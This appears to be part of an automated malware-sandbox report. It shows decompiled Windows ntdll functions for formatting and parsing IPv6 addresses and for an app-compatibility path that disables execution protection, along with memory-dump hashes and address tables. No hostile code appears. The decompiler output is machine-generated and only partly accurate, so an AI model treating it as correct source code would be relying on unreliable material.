                                    0x00758a14
                                    0x00758a15
                                    0x00758a18
                                    0x00758a22
                                    0x00758b59
                                    0x00758a28
                                    0x00758a3c
                                    0x00758a3c
                                    0x00758a42
                                    0x007a1bb0
                                    0x007a1b11
                                    0x007a1b11
                                    0x00000000
                                    0x00758a48
                                    0x00758a51
                                    0x00758a5b
                                    0x00758a5e
                                    0x00758a61
                                    0x00758a69
                                    0x00758a69
                                    0x00758a6d
                                    0x00000000
                                    0x00000000
                                    0x00758a74
                                    0x00758a7c
                                    0x00758a7d
                                    0x00758a91
                                    0x00758a93
                                    0x00758a93
                                    0x00758a98
                                    0x00758a9b
                                    0x00758aa1
                                    0x00758aa1
                                    0x00758aa4
                                    0x00758aaa
                                    0x00758ab1
                                    0x00758ac5
                                    0x00758ac7
                                    0x00758ac7
                                    0x00758ac5
                                    0x00758ace
                                    0x007a1bc9
                                    0x007a1bce
                                    0x007a1bd2
                                    0x007a1bd2
                                    0x00758ad8
                                    0x00758aeb
                                    0x00758aeb
                                    0x00758af0
                                    0x00758af4
                                    0x00000000
                                    0x00758af4
                                    0x00758a42
                                    0x00758926
                                    0x00758929
                                    0x0075892c
                                    0x0075892d
                                    0x00758930
                                    0x00758935
                                    0x0075893a
                                    0x00758b51
                                    0x00758940
                                    0x00758954
                                    0x00758954
                                    0x0075895a
                                    0x007a1b63
                                    0x00000000
                                    0x00758960
                                    0x00758969
                                    0x00758973
                                    0x00758976
                                    0x00758979
                                    0x0075897e
                                    0x00758981
                                    0x00758981
                                    0x00758986
                                    0x00000000
                                    0x00000000
                                    0x007a1b6e
                                    0x007a1b74
                                    0x007a1b7b
                                    0x007a1b8f
                                    0x007a1b91
                                    0x007a1b91
                                    0x007a1b99
                                    0x007a1b9c
                                    0x007a1ba2
                                    0x007a1ba2
                                    0x0075898c
                                    0x00758992
                                    0x00758999
                                    0x007589ad
                                    0x007a1ba8
                                    0x007a1ba8
                                    0x007589ad
                                    0x007589b6
                                    0x007589c8
                                    0x007589cd
                                    0x007589d0
                                    0x007589d0
                                    0x007589d6
                                    0x007589e8
                                    0x007589e8
                                    0x007589ed
                                    0x00000000
                                    0x007589ed
                                    0x0075895a
                                    0x0075883e
                                    0x00758841
                                    0x00758844
                                    0x00758845
                                    0x00758848
                                    0x0075884d
                                    0x00758852
                                    0x00758b49
                                    0x00758858
                                    0x0075886c
                                    0x0075886c
                                    0x00758872
                                    0x007a1b0e
                                    0x00000000
                                    0x00758878
                                    0x00758881
                                    0x0075888b
                                    0x0075888e
                                    0x00758891
                                    0x00758896
                                    0x00758899
                                    0x00758899
                                    0x0075889e
                                    0x00000000
                                    0x00000000
                                    0x007a1b21
                                    0x007a1b27
                                    0x007a1b2e
                                    0x007a1b42
                                    0x007a1b44
                                    0x007a1b44
                                    0x007a1b4c
                                    0x007a1b4f
                                    0x007a1b55
                                    0x007a1b55
                                    0x007588a4
                                    0x007588aa
                                    0x007588b1
                                    0x007588c5
                                    0x007a1b5b
                                    0x007a1b5b
                                    0x007588c5
                                    0x007588ce
                                    0x007588e0
                                    0x007588e5
                                    0x007588e8
                                    0x007588e8
                                    0x007588ee
                                    0x00758900
                                    0x00758900
                                    0x00758905
                                    0x00000000
                                    0x00758905

                                    APIs
                                    Strings
                                    • Kernel-MUI-Language-Disallowed, xrefs: 00758914
                                    • Kernel-MUI-Number-Allowed, xrefs: 007587E6
                                    • Kernel-MUI-Language-Allowed, xrefs: 00758827
                                    • WindowsExcludedProcs, xrefs: 007587C1
                                    • Kernel-MUI-Language-SKU, xrefs: 007589FC
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: _wcspbrk
                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                    • API String ID: 402402107-258546922
                                    • Opcode ID: a167312b6b4213007bb782e31a2330bf927fa09dad8f62f4225cc884200cffac
                                    • Instruction ID: 0a2a6bccf57b74669135fc915fec59ba5444a59e5f638f92d9dfc0a2d4a0b0b9
                                    • Opcode Fuzzy Hash: a167312b6b4213007bb782e31a2330bf927fa09dad8f62f4225cc884200cffac
                                    • Instruction Fuzzy Hash: 34F115B2D00209EFDF51DF94C985DEEB7B8FF08301F14446AE905A7211EB78AA45DB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 007713CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 38%
                                    			E007713CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00767707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x732926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00767707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x739cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00767707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00767707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00767707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00767707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                    0x007713d5
                                    0x007713d9
                                    0x007713dc
                                    0x007713de
                                    0x007713e1
                                    0x007713e8
                                    0x007713ee
                                    0x0079e8fd
                                    0x00000000
                                    0x0079e921
                                    0x0079e921
                                    0x0079e928
                                    0x0079e982
                                    0x0079e98a
                                    0x00000000
                                    0x0079e99a
                                    0x0079e99e
                                    0x0079e9a3
                                    0x0079e9a8
                                    0x0079e9b9
                                    0x0079e978
                                    0x00000000
                                    0x0079e978
                                    0x0079e98a
                                    0x0079e92a
                                    0x0079e931
                                    0x0079e944
                                    0x0079e944
                                    0x0079e950
                                    0x0079e954
                                    0x0079e959
                                    0x0079e95e
                                    0x0079e963
                                    0x0079e970
                                    0x00000000
                                    0x0079e975
                                    0x0079e93b
                                    0x0079e980
                                    0x00000000
                                    0x0079e980
                                    0x0079e942
                                    0x0079e94b
                                    0x00000000
                                    0x0079e94b
                                    0x00000000
                                    0x0079e942
                                    0x007713f4
                                    0x007713f4
                                    0x007713f9
                                    0x007713fc
                                    0x007713ff
                                    0x00771406
                                    0x0079e9cc
                                    0x0079e9d2
                                    0x0079e9d2
                                    0x0079e9cc
                                    0x0077140c
                                    0x00771411
                                    0x00771431
                                    0x0077143a
                                    0x0077143c
                                    0x0077143f
                                    0x0077143f
                                    0x00771442
                                    0x00771447
                                    0x007714a8
                                    0x007714ac
                                    0x0079e9e2
                                    0x0079e9e7
                                    0x0079e9ec
                                    0x0079ea05
                                    0x0079ea05
                                    0x00000000
                                    0x00771449
                                    0x00000000
                                    0x00771449
                                    0x0077144c
                                    0x00771459
                                    0x00771462
                                    0x00771469
                                    0x0077146a
                                    0x00771470
                                    0x00771473
                                    0x00771476
                                    0x00771476
                                    0x00771490
                                    0x00771495
                                    0x0077138e
                                    0x00771390
                                    0x00771397
                                    0x00771398
                                    0x00771399
                                    0x007713a1
                                    0x007713a4
                                    0x007713a4
                                    0x00771498
                                    0x0077149c
                                    0x0077149f
                                    0x007714a2
                                    0x00000000
                                    0x00000000
                                    0x007714a4
                                    0x00000000
                                    0x007714a4
                                    0x00771413
                                    0x00771415
                                    0x00771416
                                    0x00771419
                                    0x0077141c
                                    0x00771422
                                    0x007713b7
                                    0x007713bc
                                    0x007713bf
                                    0x007713bf
                                    0x007713c2
                                    0x00771424
                                    0x00771424
                                    0x00771424
                                    0x00771427
                                    0x0077142b
                                    0x0077142c
                                    0x0077142c
                                    0x0077142c
                                    0x00000000
                                    0x0077141c
                                    0x00771411

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: ___swprintf_l
                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                    • API String ID: 48624451-2108815105
                                    • Opcode ID: 59c23085ba10354ed0dbefd77a867b06506bf85c047e00b519c9bda4d0c4d4ad
                                    • Instruction ID: a592f67da5e6c95447368361a62582baff0230017c4683c62d1ce5317f2ce97e
                                    • Opcode Fuzzy Hash: 59c23085ba10354ed0dbefd77a867b06506bf85c047e00b519c9bda4d0c4d4ad
                                    • Instruction Fuzzy Hash: A96137B1900655EADF34CF5DC8808BE7BB5EF94300B94C52DF99A47641D27CAA40CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00767EFD, Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 127COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 64%
                                    			E00767EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x812088; // 0x777d6234
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E00767F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E00783F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E0073DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x814218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E00783F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E00740D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E00783F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E00748375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E00783F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E007AE8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E00783F92();
					_t38 = 1;
					L2:
					return E0073E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                    0x00767f08
                                    0x00767f0f
                                    0x00767f12
                                    0x00767f1b
                                    0x00767f31
                                    0x00783ead
                                    0x00783eb4
                                    0x00000000
                                    0x00000000
                                    0x00783eba
                                    0x00783ecd
                                    0x00783ed2
                                    0x00783ee1
                                    0x00783ee7
                                    0x00783eec
                                    0x00783f12
                                    0x00783f18
                                    0x00783f1a
                                    0x00000000
                                    0x00000000
                                    0x00783f20
                                    0x00783f26
                                    0x00783f28
                                    0x00000000
                                    0x00000000
                                    0x00783f2e
                                    0x00783f30
                                    0x00000000
                                    0x00000000
                                    0x00783f3a
                                    0x00783f3b
                                    0x00783f53
                                    0x00783f64
                                    0x00783f69
                                    0x00783f6c
                                    0x00783f6d
                                    0x00783f6f
                                    0x0078e304
                                    0x0078e30f
                                    0x0078e315
                                    0x0078e31e
                                    0x0078e321
                                    0x0078e327
                                    0x0078e329
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0078e32f
                                    0x0078e32f
                                    0x0078e337
                                    0x0078e33a
                                    0x0078e33b
                                    0x0078e33d
                                    0x0078e33f
                                    0x0078e341
                                    0x0078e341
                                    0x0078e34e
                                    0x0078e353
                                    0x0078e358
                                    0x0078e35d
                                    0x0078e35f
                                    0x00000000
                                    0x00000000
                                    0x0078e365
                                    0x0078e365
                                    0x0078e368
                                    0x0078e36e
                                    0x00000000
                                    0x00000000
                                    0x0078e374
                                    0x0078e32f
                                    0x00783f75
                                    0x00783f7a
                                    0x00783f7c
                                    0x00783f7e
                                    0x00783f86
                                    0x00767f39
                                    0x00767f47
                                    0x00767f47
                                    0x00767f37
                                    0x00767f37
                                    0x00000000

                                    APIs
                                    • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00783F12
                                    Strings
                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00783F75
                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0078E2FB
                                    • 4b}w, xrefs: 00767F08
                                    • Execute=1, xrefs: 00783F5E
                                    • ExecuteOptions, xrefs: 00783F04
                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00783F4A
                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 0078E345
                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00783EC4
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: BaseDataModuleQuery
                                    • String ID: 4b}w$CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                    • API String ID: 3901378454-236298059
                                    • Opcode ID: 8c3e7fdc5723d0e96eb76f8360080767cb1f7082ea6d171203cbb11717abd005
                                    • Instruction ID: 30286a2fc8b3622a829d088f6c0825a0d86035c3761885e44a4e3d126e91a33d
                                    • Opcode Fuzzy Hash: 8c3e7fdc5723d0e96eb76f8360080767cb1f7082ea6d171203cbb11717abd005
                                    • Instruction Fuzzy Hash: 2641AD7168061CFADB20AE54DCCAFDA73BCAF54714F000595B605E6092EB789B46CFA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00770B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00770B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E00748980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E0073DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E00770CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E00770CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E007706BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E007706BA(_t135, _t178) == 0 || E00770A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E00770CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E00770CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E007706BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E007706BA(_t124, _t142) == 0 || E00770A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                    0x00770b21
                                    0x00770b24
                                    0x00770b27
                                    0x00770b2a
                                    0x00770b2d
                                    0x00770b30
                                    0x00770b33
                                    0x00770b36
                                    0x00770b39
                                    0x00770b3e
                                    0x00770c65
                                    0x00770c68
                                    0x00770c6a
                                    0x00770c6f
                                    0x0079eb42
                                    0x00000000
                                    0x00000000
                                    0x0079eb48
                                    0x0079eb48
                                    0x00770c75
                                    0x00770c7a
                                    0x0079eb54
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0079eb5a
                                    0x00770c80
                                    0x00770c84
                                    0x0079eb98
                                    0x00000000
                                    0x00000000
                                    0x0079eba6
                                    0x00770cb8
                                    0x00770cba
                                    0x00770cd3
                                    0x00770cda
                                    0x00770ce4
                                    0x00770ce9
                                    0x00000000
                                    0x00770cec
                                    0x00770c8c
                                    0x0079eb63
                                    0x00000000
                                    0x00000000
                                    0x0079eb70
                                    0x0079eb75
                                    0x0079eb7d
                                    0x00000000
                                    0x00000000
                                    0x0079eb8c
                                    0x00000000
                                    0x0079eb8c
                                    0x00770c96
                                    0x00000000
                                    0x00000000
                                    0x00770ca2
                                    0x00770cac
                                    0x00770cb4
                                    0x00000000
                                    0x00000000
                                    0x00770b44
                                    0x00770b47
                                    0x00770b49
                                    0x00000000
                                    0x00000000
                                    0x00770b4f
                                    0x00770b50
                                    0x00000000
                                    0x00000000
                                    0x00770b56
                                    0x00770b62
                                    0x00770b7c
                                    0x00770bac
                                    0x00770a0f
                                    0x0079eaaa
                                    0x00000000
                                    0x0079eac4
                                    0x0079eac4
                                    0x00770bd0
                                    0x00770bd0
                                    0x00770bd4
                                    0x00770bd9
                                    0x00000000
                                    0x00000000
                                    0x00770bdb
                                    0x00770be0
                                    0x0079eb0e
                                    0x00770a1a
                                    0x00000000
                                    0x00770a1a
                                    0x0079eb1a
                                    0x0079eb1f
                                    0x0079eb27
                                    0x00000000
                                    0x00000000
                                    0x0079eb36
                                    0x00000000
                                    0x0079eb36
                                    0x00770bea
                                    0x00000000
                                    0x00000000
                                    0x00770bf6
                                    0x00770c00
                                    0x00770c03
                                    0x00770c0b
                                    0x00000000
                                    0x00770c0b
                                    0x0079eaaa
                                    0x00000000
                                    0x00770a15
                                    0x00770bb6
                                    0x00000000
                                    0x00770bc6
                                    0x00770bc6
                                    0x00770bcb
                                    0x00770c15
                                    0x00000000
                                    0x00000000
                                    0x00770c1d
                                    0x00770c20
                                    0x00770c21
                                    0x00770c24
                                    0x00770c24
                                    0x00770c26
                                    0x00000000
                                    0x00770c26
                                    0x00770bcd
                                    0x00000000
                                    0x00770bcd
                                    0x00770b89
                                    0x00770b89
                                    0x00770b90
                                    0x00000000
                                    0x00000000
                                    0x00770b96
                                    0x00000000
                                    0x00770b96
                                    0x00770a04
                                    0x00770a04
                                    0x00770b9a
                                    0x00770b9a
                                    0x00770b9b
                                    0x00770b9f
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00770ba5
                                    0x00770ac7
                                    0x00770aca
                                    0x0079eacf
                                    0x00000000
                                    0x0079eade
                                    0x0079eade
                                    0x0079eae3
                                    0x00000000
                                    0x00000000
                                    0x0079eaf3
                                    0x0079eaf6
                                    0x0079eaf7
                                    0x0079eafe
                                    0x0079eb01
                                    0x00000000
                                    0x0079eb01
                                    0x0079eacf
                                    0x00770ad0
                                    0x00770ad4
                                    0x00000000
                                    0x00000000
                                    0x00770ada
                                    0x00770ae6
                                    0x00770c34
                                    0x00000000
                                    0x00770c47
                                    0x00770c49
                                    0x00770c4a
                                    0x00770c4e
                                    0x00770c51
                                    0x00770c54
                                    0x00770c57
                                    0x00770c5a
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00770c60
                                    0x00770afb
                                    0x00770afe
                                    0x00770b02
                                    0x00770b05
                                    0x00770b08
                                    0x00000000
                                    0x00770b08
                                    0x00770ae6
                                    0x00770b44
                                    0x007709f8
                                    0x007709f8
                                    0x007709f9
                                    0x00000000
                                    0x00000000
